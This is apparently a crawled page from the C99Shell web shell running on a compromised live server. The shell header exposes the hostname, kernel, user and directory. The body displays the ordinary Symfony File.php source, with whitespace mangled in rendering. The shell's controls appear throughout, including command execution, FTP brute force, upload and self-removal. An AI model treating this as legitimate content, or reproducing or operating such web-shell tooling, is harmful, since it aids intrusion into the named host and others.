!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/gateway.picotech.app/public_html/vendor/symfony/http-foundation/File/   drwxr-xr-x
Free 28.53 GB of 117.98 GB (24.18%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     File.php (4.46 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

/*
 * This file is part of the Symfony package.
 *
 * (c) Fabien Potencier <fabien@symfony.com>
 *
 * For the full copyright and license information, please view the LICENSE
 * file that was distributed with this source code.
 */

namespace Symfony\Component\HttpFoundation\File;

use 
Symfony\Component\HttpFoundation\File\Exception\FileException;
use 
Symfony\Component\HttpFoundation\File\Exception\FileNotFoundException;
use 
Symfony\Component\Mime\MimeTypes;

/**
 * A file in the file system.
 *
 * @author Bernhard Schussek <bschussek@gmail.com>
 */
class File extends \SplFileInfo
{
    
/**
     * Constructs a new file from the given path.
     *
     * @param string $path      The path to the file
     * @param bool   $checkPath Whether to check the path or not
     *
     * @throws FileNotFoundException If the given path is not a file
     */
    
public function __construct(string $pathbool $checkPath true)
    {
        if (
$checkPath && !is_file($path)) {
            throw new 
FileNotFoundException($path);
        }

        
parent::__construct($path);
    }

    
/**
     * Returns the extension based on the mime type.
     *
     * If the mime type is unknown, returns null.
     *
     * This method uses the mime type as guessed by getMimeType()
     * to guess the file extension.
     *
     * @return string|null
     *
     * @see MimeTypes
     * @see getMimeType()
     */
    
public function guessExtension()
    {
        if (!
class_exists(MimeTypes::class)) {
            throw new 
\LogicException('You cannot guess the extension as the Mime component is not installed. Try running "composer require symfony/mime".');
        }

        return 
MimeTypes::getDefault()->getExtensions($this->getMimeType())[0] ?? null;
    }

    
/**
     * Returns the mime type of the file.
     *
     * The mime type is guessed using a MimeTypeGuesserInterface instance,
     * which uses finfo_file() then the "file" system binary,
     * depending on which of those are available.
     *
     * @return string|null
     *
     * @see MimeTypes
     */
    
public function getMimeType()
    {
        if (!
class_exists(MimeTypes::class)) {
            throw new 
\LogicException('You cannot guess the mime type as the Mime component is not installed. Try running "composer require symfony/mime".');
        }

        return 
MimeTypes::getDefault()->guessMimeType($this->getPathname());
    }

    
/**
     * Moves the file to a new location.
     *
     * @return self
     *
     * @throws FileException if the target file could not be created
     */
    
public function move(string $directory, ?string $name null)
    {
        
$target $this->getTargetFile($directory$name);

        
set_error_handler(function ($type$msg) use (&$error) { $error $msg; });
        try {
            
$renamed rename($this->getPathname(), $target);
        } finally {
            
restore_error_handler();
        }
        if (!
$renamed) {
            throw new 
FileException(sprintf('Could not move the file "%s" to "%s" (%s).'$this->getPathname(), $targetstrip_tags($error)));
        }

        @
chmod($target0666 & ~umask());

        return 
$target;
    }

    public function 
getContent(): string
    
{
        
$content file_get_contents($this->getPathname());

        if (
false === $content) {
            throw new 
FileException(sprintf('Could not get the content of the file "%s".'$this->getPathname()));
        }

        return 
$content;
    }

    
/**
     * @return self
     */
    
protected function getTargetFile(string $directory, ?string $name null)
    {
        if (!
is_dir($directory)) {
            if (
false === @mkdir($directory0777true) && !is_dir($directory)) {
                throw new 
FileException(sprintf('Unable to create the "%s" directory.'$directory));
            }
        } elseif (!
is_writable($directory)) {
            throw new 
FileException(sprintf('Unable to write in the "%s" directory.'$directory));
        }

        
$target rtrim($directory'/\\').\DIRECTORY_SEPARATOR.(null === $name $this->getBasename() : $this->getName($name));

        return new 
self($targetfalse);
    }

    
/**
     * Returns locale independent base name of the given path.
     *
     * @return string
     */
    
protected function getName(string $name)
    {
        
$originalName str_replace('\\''/'$name);
        
$pos strrpos($originalName'/');
        
$originalName false === $pos $originalName substr($originalName$pos 1);

        return 
$originalName;
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0053 ]--